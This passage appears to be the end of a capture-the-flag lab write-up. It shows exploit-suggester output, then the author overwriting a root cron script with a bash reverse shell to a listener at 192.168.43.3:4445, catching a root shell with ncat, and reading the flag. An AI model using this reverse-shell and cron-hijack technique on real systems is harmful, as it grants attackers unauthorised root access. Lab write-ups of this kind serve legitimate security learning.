Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
$ cat /etc/cron.d/logrotate
*/5 * * * * root /usr/local/sbin/cron-logrotate.sh
$ echo '#!/bin/bash\nbash -i >& /dev/tcp/192.168.43.3/4445 0>&1' > /usr/local/sbin/cron-logrotate.sh
$ cat /usr/local/sbin/cron-logrotate.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.43.3/4445 0>&1
Getting a root shell and capturing the flag:
The cronjob runs every 5 minutes. It ran and i got a root shell:
[gandosha@GandoPC ~]$ ncat -lvnp 4445
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 192.168.43.10.
Ncat: Connection from 192.168.43.10:50996.
bash: cannot set terminal process group (2130): Inappropriate ioctl for device
bash: no job control in this shell
root@red:~# pwd
pwd
/root
root@red:~# ls
ls
fix-wordpress.sh
flag.txt
issue
python.sh
wordpress.sql
root@red:~# cat flag.txt
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
